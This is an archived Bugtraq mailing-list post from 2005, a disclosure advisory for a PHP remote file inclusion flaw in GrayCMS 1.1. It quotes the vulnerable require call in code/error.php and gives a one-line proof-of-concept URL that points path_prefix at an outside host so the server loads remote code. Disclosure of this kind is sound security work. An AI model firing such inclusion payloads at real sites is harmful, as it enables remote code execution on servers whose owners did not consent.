Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

GrayCMS php code injection
From: Kold <maggik () gala net>
Date: 26 Apr 2005 11:45:32 -0000


Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others

  By Date           By Thread  

Current thread:
  • GrayCMS php code injection Kold (Apr 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]